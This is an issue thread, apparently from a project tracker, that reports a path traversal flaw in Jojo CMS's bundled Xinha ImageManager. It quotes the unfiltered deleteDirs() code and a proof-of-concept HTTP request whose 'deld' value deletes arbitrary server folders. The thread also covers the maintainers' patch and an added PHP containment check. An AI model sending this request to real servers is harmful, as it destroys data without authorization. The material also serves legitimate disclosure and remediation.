a path travel vuln in jojocms #30
Comments
Cool. Thanks. Will patch it. Xinha is third-party code that is no longer being updated so will patch the local copy

Although to get to that path you would have to have Jojo installed inside your web root folder which is not in any way recommended, for exactly this reason (and probably a whole bunch of others), which is the main reason it was designed to run from outside root.

I'm thinking that a requirement to have admin permissions on the xinha would cover it.

Okay I've added an .htaccess file that prepends a file to every file and requires the $isadmin variable to be set so that even if you do have it in the webroot you have to call it through jojo (so that $isadmin is set) and be logged in as admin. Please test and let us know if this fixes all your concerns.

nice.

Well, an unauthorized user cannot use the ImageManager and ExtendedFileManager with the patch.

There is a path travel vuln that can delete any folder on the server, and it can be done by an unauthorized remote attacker.
Code
./plugins/jojo_core/external/xinhan/plugins/ImageManager/Classes/ImageManager.php
line 602~608
```php
function deleteDirs()
{
    // 'deld' is taken from the query string and handed to _delDir() unchecked
    if(isset($_GET['deld']))
        return $this->_delDir(rawurldecode($_GET['deld']));
    else
        Return false;
}
```
The parameter $_GET['deld'] should be filtered.
Poc
GET /plugins/jojo_core/external/xinha/plugins/imageManager/backend.php?__plugin=ImageManager&__function=images&dir=/&deld=/../../../../../../../../001/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/plugins/jojo_core/external/xinha/plugins/imageManager/backend.php?__plugin=ImageManager&__function=images
Cookie:
Connection: close
Upgrade-Insecure-Requests: 1
before the post


after the post
Chen ruiqi
Codesafe Team
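One way to filter the `deld` value before any delete call, shown as an added example that is not Jojo CMS or Xinha code: the requested directory is canonicalized and accepted only if it lies strictly below the image base directory. The function name `resolveInsideBase` and the temporary directory layout are hypothetical and constructed for the demonstration.

```php
<?php
/**
 * Resolve a user-supplied relative directory against $baseDir and return the
 * canonical path only if it is a strict descendant of $baseDir.
 * Returns false for traversal attempts, the base itself, or missing paths.
 * (Hypothetical helper, not part of Xinha's ImageManager.)
 */
function resolveInsideBase(string $baseDir, string $userPath)
{
    $base = realpath($baseDir);
    if ($base === false || strpos($userPath, "\0") !== false) {
        return false;
    }
    // realpath() collapses "..", "." and symlinks; it fails if the target is missing.
    $target = realpath($base . DIRECTORY_SEPARATOR . ltrim($userPath, '/\\'));
    if ($target === false || !is_dir($target)) {
        return false;
    }
    // Compare with a trailing separator so "/images-old" does not match "/images".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    // Never allow the base directory itself to be the delete target.
    return ($target === $base) ? false : $target;
}

// Constructed demo layout: <tmp>/deld_demo_<pid>/images/album and <tmp>/deld_demo_<pid>/001
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'deld_demo_' . getmypid();
mkdir($root . '/images/album', 0700, true);
mkdir($root . '/001', 0700, true);

$base = $root . '/images';
// Constructed sample values; the third is the 'deld' value from the report above.
$samples = ['/album/', '/../001/', '/../../../../../../../../001/', '/', '/album/../../001'];
foreach ($samples as $deld) {
    $resolved = resolveInsideBase($base, rawurldecode($deld));
    printf("%-34s => %s\n", $deld, $resolved === false ? 'rejected' : 'allowed: ' . $resolved);
}

// Remove the demo directories again.
rmdir($root . '/images/album');
rmdir($root . '/images');
rmdir($root . '/001');
rmdir($root);
```

A containment check of this kind complements the admin requirement discussed in the comments: the first limits who can reach the delete function, the second limits what it can touch.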